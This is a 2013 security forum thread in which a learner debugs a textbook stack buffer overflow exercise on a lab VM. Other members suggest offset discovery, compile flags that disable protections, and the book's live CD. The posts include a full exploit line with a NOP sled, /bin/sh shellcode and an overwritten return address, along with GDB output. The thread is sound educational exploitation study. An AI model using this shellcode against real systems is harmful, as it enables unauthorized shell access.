.

Buffer Overflows and Nop Sled

<<

digitalvampire

Newbie
Newbie

Posts: 23

Joined: Wed Mar 07, 2012 7:49 am

Post Fri Jan 04, 2013 3:59 pm

Buffer Overflows and Nop Sled

Hey Guys,
(Not sure if this is a double post, I sent one in a few mins ago but it didn't seem to take)

I've been playing around with Buffer Overflows this week, and I seem to be running into a strange issue.  I am going to try my best to explain it.

I've been working with the examples in "The Art of Exploitation" The first one is vuln.c and here is the code:

  Code:
int main(int argc, char *argv[])
{
   char buffer[500];
   strcpy(buffer, argv[1]);
   return 0;
}



I compiled the program with the -fno-stack-protector and the -mpreferred-stack-boundary=2 and I've also made sure ASLR is off (running Ubuntu 12.10 in a vm)

I've been calculating my return address from subtracting about 400 from the ESP value after the buffer has been added onto the stack.  I figured this is where the nop sled should be.  I have actually gotten it to the point where it will segfault and print out that address that I was throwing at it, but I guess I'm curious why if EIP has that address it's not launching the sled and sliding down to my shellcode?  I'm aware of the divisible by 4 rule, and I'm pretty sure I have that in place too..

Here is the GDB session with the info I'm throwing at it:

  Code:
Starting program: /root/aeh/bof/vulnerableapp `perl -e 'print "\x90" x 300 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x8a\xf1\xff\xbf" x 45'`

Breakpoint 1, main (argc=2, argv=0xbffff604) at vul.c:8
8               strcpy(buffer, argv[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff18a in ?? ()



Any ideas on how to attack this next?  I'd really like to learn this, its rather exciting :)

Thanks in advance for all your help!

Sincerely,

-DV
Last edited by digitalvampire on Fri Jan 04, 2013 4:37 pm, edited 1 time in total.
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Fri Jan 04, 2013 5:55 pm

Re: Buffer Overflows and Nop Sled

I'd try to find out what your exact offset is through a cyclic pattern (i.e. pattern_create.rb) or a binary tree analysis. I wouldn't just ballpark approximate values.

What address are you submitting to EIP? It should be something like a jmp esp address, not an address somewhere in your NOP sled.

It's kind of difficult to troubleshoot your issue without the register values, stack contents, full exploit, etc.
The day you stop learning is the day you start becoming obsolete.
<<

digitalvampire

Newbie
Newbie

Posts: 23

Joined: Wed Mar 07, 2012 7:49 am

Post Fri Jan 04, 2013 6:09 pm

Re: Buffer Overflows and Nop Sled

Thanks, that actually helps a lot..!

Is there a way through gdb I can dump the full contents of the stack ?

I've actually been trying to exploit it via command line for now using:

  Code:
`perl -e 'print "\x90" x 300 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x8a\xf1\xff\xbf" x 45'`


I was submitting this address for the EIP: 0xbffff18a

Except I submitted it via Little Endian style.

I thought if I pointed it to an address in the Nop Sled, it would slide down to the code?  

Thanks again!! :)

*Edit:

After getting a whole bunch of strewn test files everywhere, I started clean, but still with the same issue.  Here is a dump of the EIP after the seg fault..

  Code:
Program received signal SIGSEGV, Segmentation fault.
0xbffff4a4 in ?? ()
(gdb) x/20x $eip
0xbffff4a4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4b4:     0x31909090      0x01ec83c0      0x68240488      0x68736162
0xbffff4c4:     0x6e696268      0x01ec832f      0x2f2404c6      0x5650e689
0xbffff4d4:     0xf3890bb0      0xd231e189      0x01b080cd      0x80cddb31
0xbffff4e4:     0xbffff4a4      0xbffff4a4      0xbffff4a4      0xbffff4a4
(gdb)



The repeated return address entered was: 0xbffff4a4 which looks almost successful as the segfault is giving me that as its value for EIP.  Why is it stopping here?  I have ideas but they are somewhat mangled :)

Thanks!!
Last edited by digitalvampire on Fri Jan 04, 2013 8:19 pm, edited 1 time in total.
<<

superkojiman

User avatar

Jr. Member
Jr. Member

Posts: 81

Joined: Thu Sep 20, 2012 9:42 pm

Post Sat Jan 05, 2013 10:43 pm

Re: Buffer Overflows and Nop Sled

I was able to exploit the example on Ubuntu 10.04, but only by compiling it with -z execstack. That is:

gcc -fno-stack-protector -mpreferred-stack-boundary=2 -ggdb -o vuln -z execstack vuln.c

The book comes with a live CD that should turn off (or not include) certain security features that would prevent the exploits from working. I would suggest using that while going through the exploit examples.

Some references that might be helpful if you do choose to use a more current Linux distribution:

https://www.soldierx.com/tutorials/Stac ... nux-System
http://paulmakowski.wordpress.com/2011/ ... k-in-2011/
OSCP + OSCE
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sat Jan 05, 2013 11:51 pm

Re: Buffer Overflows and Nop Sled

+1 to just using the accompanying CD: http://nostarch.com/hackingCD.htm

That'll remove a lot of the weird variables that may unexpectedly crop up on more recent Linux distros (i.e. default GCC protections).

The book doesn't address them, so not going through it as intended will result in unnecessary headaches. Superkojiman provided good resources for further study.
The day you stop learning is the day you start becoming obsolete.
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Mon Jan 07, 2013 8:11 am

Re: Buffer Overflows and Nop Sled

You can also take a look at some very good and free video tutorials from securitytube.net.

Buffer Overflow Exploitation Megaprimer for Linux: http://www.securitytube.net/groups?oper ... &groupId=4

Good luck!
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

digitalvampire

Newbie
Newbie

Posts: 23

Joined: Wed Mar 07, 2012 7:49 am

Post Mon Jan 07, 2013 11:13 am

Re: Buffer Overflows and Nop Sled

Thanks guys! :)  I too figured out that there was something weird going on.. and switched to using DVL to compile which seemed to work.  I did not know about that extra switch for gcc though, I'm going to try it on my Ubuntu machine.

I have the original book, 1st edition which doesn't have the CD - but I think with that extra compile parameter it should work better.. and if not I can keep compiling in DVL. 

The SecurityTube videos are great, I went through those recently and always look forward to him adding more.., I have been meaning to try the Python series when I get a chance. (I'm a python fanatic..)

Thanks again guys!! :)

-DV
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Mon Jan 07, 2013 12:34 pm

Re: Buffer Overflows and Nop Sled

The Python series is great, too.  You'll enjoy it.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

superkojiman

User avatar

Jr. Member
Jr. Member

Posts: 81

Joined: Thu Sep 20, 2012 9:42 pm

Post Mon Jan 07, 2013 1:06 pm

Re: Buffer Overflows and Nop Sled

digitalvampire wrote:I have the original book, 1st edition which doesn't have the CD - but I think with that extra compile parameter it should work better.. and if not I can keep compiling in DVL. 



The link ajohnson provided has a link that allows you to download the ISO in case the CD that came with the book is broken (or in your case, not included). Here's the direct link to the ISO: http://www.mininova.org/tor/2533556
OSCP + OSCE
<<

digitalvampire

Newbie
Newbie

Posts: 23

Joined: Wed Mar 07, 2012 7:49 am

Post Tue Jan 08, 2013 5:51 am

Re: Buffer Overflows and Nop Sled

Thanks again! :)  I will definitely get that CD, especially since it was designed specifically for the exercises in the book.

Thanks !!

-DV

Return to Programming

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software